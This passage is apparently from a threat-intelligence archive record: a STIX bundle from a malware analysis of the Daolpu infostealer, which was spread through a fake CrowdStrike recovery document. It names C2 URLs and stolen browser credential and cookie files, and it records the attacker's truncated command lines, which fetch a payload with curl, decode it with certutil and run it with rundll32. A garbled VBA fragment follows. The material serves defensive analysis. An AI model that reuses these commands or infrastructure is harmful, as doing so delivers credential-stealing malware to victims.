],\r\n \"capabilities\": [\r\n \"steals-authentication-credentials\",\r\n \"communicates-with-c2\",\r\n \"exfiltrates-data\",\r\n \"fingerprints-host\"\r\n ],\r\n \"sample_refs\": [\r\n \"file--58970bff-b7a9-4b85-8c88-34c16a852e8e\",\r\n \"file--26d5f6ec-cc77-4162-bdff-401a515689d7\",\r\n \"file--ea34c3fe-1d5b-4cf6-92e1-7e02cd878242\"\r\n ]\r\n },\r\n {\r\n \"type\": \"malware\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n \"is_family\": false,\r\n \"name\": \"Daolpu Macrovirus\",\r\n \"malware_types\": [\r\n \"downloader\"\r\n ],\r\n \"sample_refs\": [\r\n \"file--5760335e-071a-4267-af37-8ce39a563a10\"\r\n ]\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--0974b3d8-9291-4e6c-9f07-4b20ea435278\",\r\n \"name\": \"ThisDocument.cls\",\r\n \"hashes\": {\r\n \"SHA-256\": \"6d3f611353c7fc8aa65b48b3bc054682aad6b2d7c1321f4fb1b6ed98bb88aa9d\"\r\n },\r\n \"mime_type\": \"text/plain\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--5760335e-071a-4267-af37-8ce39a563a10\",\r\n \"name\": \"New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm\",\r\n \"hashes\": {\r\n \"SHA-256\": \"803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61\"\r\n },\r\n \"mime_type\": \"application/msword\",\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 25 of 30\n\n\"contains_refs\": \"file--0974b3d8-9291-4e6c-9f07-4b20ea435278\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--3ad05b73-3251-4b41-beca-5de1accc9a5e\",\r\n \"name\": \"payload2.txt\",\r\n \"hashes\": {\r\n \"SHA-256\": \"5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721\"\r\n },\r\n \"mime_type\": \"text/plain\"\r\n },\r\n {\r\n \"type\": \"url\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"url--af891d7d-9bcc-4fb4-9bed-5feb52908e24\",\r\n \"value\": \"http://172.104.160.126:8099/payload2.txt\"\r\n },\r\n {\r\n \"type\": \"url\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"url--0bae24fb-6bfd-483f-82a3-32cac7626dee\",\r\n \"value\": \"http://172.104.160.126:8099/Uploadss\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--58970bff-b7a9-4b85-8c88-34c16a852e8e\",\r\n \"name\": \"mscorsvc.dll\",\r\n \"hashes\": {\r\n \"SHA-256\": \"4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a\"\r\n },\r\n \"mime_type\": \"application/x-msdownload\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--26d5f6ec-cc77-4162-bdff-401a515689d7\",\r\n \"name\": \"mscorsvc.dll\",\r\n \"hashes\": {\r\n \"SHA-256\": \"3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8\"\r\n },\r\n \"mime_type\": \"application/x-msdownload\"\r\n },\r\n {\r\n \"type\": \"file\",\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 26 of 30\n\n\"spec_version\": \"2.1\",\r\n \"id\": \"file--ea34c3fe-1d5b-4cf6-92e1-7e02cd878242\",\r\n \"name\": \"mscorsvc.dll\",\r\n \"hashes\": {\r\n \"SHA-256\": \"f0fce67c1f360d045c21249f6faaac4d64b36aad02c8b877ab7db1e35f7c71f5\"\r\n },\r\n \"mime_type\": \"application/x-msdownload\"\r\n },\r\n {\r\n \"type\": \"relationship\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"relationship--621277c3-198e-4c9a-b91b-ed54eacd33de\",\r\n \"relationship_type\": \"impersonates\",\r\n \"source_ref\": \"campaign--c014b573-2a94-4c09-aaf9-2c5330dedb06\",\r\n \"target_ref\": \"identity--bdc38620-34da-418b-9b72-fc1ae34b398f\"\r\n },\r\n {\r\n \"type\": \"relationship\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"relationship--2841bbbc-adf0-4b6e-be1c-ce76c953b06es\",\r\n \"relationship_type\": \"uses\",\r\n \"source_ref\": \"campaign--c014b573-2a94-4c09-aaf9-2c5330dedb06\",\r\n \"target_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\"\r\n },\r\n {\r\n \"type\": \"relationship\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"relationship--75cc4004-3430-4f6d-a62c-5a3ca02a30c4\",\r\n \"relationship_type\": \"downloads\",\r\n \"source_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n \"target_ref\": \"file--3ad05b73-3251-4b41-beca-5de1accc9a5e\"\r\n },\r\n {\r\n \"type\": \"relationship\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"relationship--b394f377-bb13-4dea-848d-518ed6bef8b6\",\r\n \"relationship_type\": \"communicates-with\",\r\n \"source_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n \"target_ref\": \"url--af891d7d-9bcc-4fb4-9bed-5feb52908e24\"\r\n },\r\n {\r\n \"type\": \"relationship\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"relationship--85dd37e7-4d4e-42db-b463-eef142ffdd9a\",\r\n \"relationship_type\": \"communicates-with\",\r\n \"source_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\",\r\n \"target_ref\": \"url--0bae24fb-6bfd-483f-82a3-32cac7626dee\"\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 27 of 30\n\n},\r\n {\r\n \"type\": \"directory\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n \"path\": \"C:\\\\Windows\\\\Temp\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--f2f79ab1-606c-47aa-8c6e-311e12612884\",\r\n \"name\": \"result.txt\",\r\n \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--dab8547d-c3d8-4834-ac06-c24780f60838\",\r\n \"name\": \"Login Data\",\r\n \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--f34cbe8f-218c-4673-8e14-25e5ed2db655\",\r\n \"name\": \"cookies.sqlite\",\r\n \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--469da665-b4b2-433a-998e-cb3741de65b4\",\r\n \"name\": \"cookies.sqlite-wal\",\r\n \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n },\r\n {\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--ffe729b5-823c-4133-b8ae-293320f4df0b\",\r\n \"name\": \"cookies.sqlite-shm\",\r\n \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n },\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 28 of 30\n\n{\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"name\": \"cmd.exe\"\r\n },\r\n {\r\n \"type\": \"tool\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"tool--76ff81fb-fb47-425e-983a-65084ce2e790\",\r\n \"name\": \"command prompt\",\r\n \"object_refs\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\"\r\n },\r\n {\r\n \"type\": \"relationship\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"relationship--fed44f3e-fed9-46b4-9b62-e06c76fca109\",\r\n \"relationship_type\": \"uses\",\r\n \"source_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n \"target_ref\": \"tool--76ff81fb-fb47-425e-983a-65084ce2e790\"\r\n },\r\n {\r\n \"type\": \"process\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"process--3104b8b4-cd0a-4f74-b791-f66c4f85fa28\",\r\n \"image_ref\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"command_line\": \"cmd /c curl.exe http://172.104.160.126:8099/payload2.txt -o C:\\\\Users\\\\admin\\\\AppData\\\\Lo\r\n },\r\n {\r\n \"type\": \"process\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"process--c73793f7-3c5d-427d-9121-9e43064eb000\",\r\n \"image_ref\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"command_line\": \"cmd /c certutil -f -decode C:\\\\Users\\\\admin\\\\AppData\\\\Local\\\\Temp\\\\mscorsvc.txt C:\\\\Users\r\n },\r\n {\r\n \"type\": \"process\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"process--c3a5ea9e-1981-44eb-8e26-1fe11cecdc0c\",\r\n \"image_ref\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"command_line\": \"cmd /c START \\\" \\\" rundll32 C:\\\\Users\\\\admin\\\\AppData\\\\Local\\\\Temp\\\\mscorsvc.dll,DllMain\"\r\n }\r\n ]\r\n}\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 29 of 30\n\nSource: https://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 30 of 30\n\nWith rngFirstParagraph .Delete       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n.InsertParagraphAfter       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n.InsertParagraphAfter       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + Ch\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\n.InsertParagraphAfter       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + C\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n   Page 21 of 30",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/"
	],
	"report_names": [
		"daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage"
	],
	"threat_actors": [],
	"ts_created_at": 1775791283,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/064281f0893bf17ff0aac2cf83baf81fd68b7d0f.pdf",
		"text": "https://archive.orkl.eu/064281f0893bf17ff0aac2cf83baf81fd68b7d0f.txt",
		"img": "https://archive.orkl.eu/064281f0893bf17ff0aac2cf83baf81fd68b7d0f.jpg"
	}
}